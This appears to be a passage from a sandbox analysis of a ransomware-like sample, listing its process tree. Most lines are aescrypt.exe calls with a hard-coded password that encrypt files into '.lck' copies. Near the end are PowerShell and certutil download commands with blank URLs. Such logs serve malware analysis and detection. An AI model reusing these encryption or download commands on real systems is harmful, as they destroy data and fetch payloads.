    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck"
    3⤵
    PID:1020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:912
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck" "IconCache.db"
    3⤵
    PID:1532
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck" "IconCache.db.lck"
    3⤵
    PID:1476
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck" "IconCache.db.lck.lck"
    3⤵
    PID:212
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck" "IconCache.db.lck.lck.lck"
    3⤵
    PID:228
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck"
    3⤵
    PID:220
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck"
    3⤵
    PID:820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:1836
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck" "IconCache.db"
    3⤵
    PID:1540
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck" "IconCache.db.lck"
    3⤵
    PID:2040
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck" "IconCache.db.lck.lck"
    3⤵
    PID:1392
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck" "IconCache.db.lck.lck.lck"
    3⤵
    PID:236
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck"
    3⤵
    PID:876
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck"
    3⤵
    PID:848
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:944
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck" "IconCache.db"
    3⤵
    PID:664
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck" "IconCache.db.lck"
    3⤵
    PID:1988
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck" "IconCache.db.lck.lck"
    3⤵
    PID:1780
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck" "IconCache.db.lck.lck.lck"
    3⤵
    PID:2004
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck"
    3⤵
    PID:1612
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck"
    3⤵
    PID:2016
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:1176
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:752
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:968
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck" "IconCache.db"
    3⤵
    PID:1656
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck" "IconCache.db.lck"
    3⤵
    PID:1256
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck" "IconCache.db.lck.lck"
    3⤵
    PID:1016
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck" "IconCache.db.lck.lck.lck"
    3⤵
    PID:1940
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck"
    3⤵
    PID:952
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck"
    3⤵
    PID:224
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:756
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:1112
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:1076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:1680
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck" "IconCache.db"
    3⤵
    PID:1128
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck" "IconCache.db.lck"
    3⤵
    PID:1232
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck" "IconCache.db.lck.lck"
    3⤵
    PID:1476
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck" "IconCache.db.lck.lck.lck"
    3⤵
    PID:212
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck"
    3⤵
    PID:228
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck"
    3⤵
    PID:220
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:820
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:1836
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:1540
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:2040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:1392
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck" "IconCache.db"
    3⤵
    PID:236
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck" "IconCache.db.lck"
    3⤵
    PID:876
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck" "IconCache.db.lck.lck"
    3⤵
    PID:848
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck" "IconCache.db.lck.lck.lck"
    3⤵
    PID:344
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck"
    3⤵
    PID:944
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck"
    3⤵
    PID:664
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:1988
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:1780
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:2004
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:1612
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:2016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:1176
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck" "IconCache.db"
    3⤵
    PID:752
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck" "IconCache.db.lck"
    3⤵
    PID:968
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck" "IconCache.db.lck.lck"
    3⤵
    PID:1656
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck" "IconCache.db.lck.lck.lck"
    3⤵
    PID:1256
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck"
    3⤵
    PID:1016
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck"
    3⤵
    PID:1940
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:952
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:224
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:756
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:1112
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:1076
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:1680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:1128
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck" "IconCache.db"
    3⤵
    PID:1232
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck" "IconCache.db.lck"
    3⤵
    PID:1476
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck" "IconCache.db.lck.lck"
    3⤵
    PID:212
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck" "IconCache.db.lck.lck.lck"
    3⤵
    PID:228
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck"
    3⤵
    PID:220
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck"
    3⤵
    PID:820
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:1836
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:1540
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:2040
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:1392
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:236
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:876
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "IconCache.db.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:308
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -c (new-object System.Net.WebClient).DownloadFile('','')
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1832
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -c Invoke-WebRequest -Uri -OutFile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:296
- - C:\Windows\system32\certutil.exe
    certutil -urlcache -split -f
    3⤵
    PID:1224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:1972
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "RDBCF7.tmp.lck" "RDBCF7.tmp"
    3⤵
    PID:928
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "FXSAPIDebugLogFile.txt.lck" "FXSAPIDebugLogFile.txt"
    3⤵
    PID:1572
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "jawshtml.html.lck" "jawshtml.html"
    3⤵
    PID:216
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "kill.bat.lck" "kill.bat"
    3⤵
    PID:1192
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "jusched.log.lck" "jusched.log"
    3⤵
    PID:2012
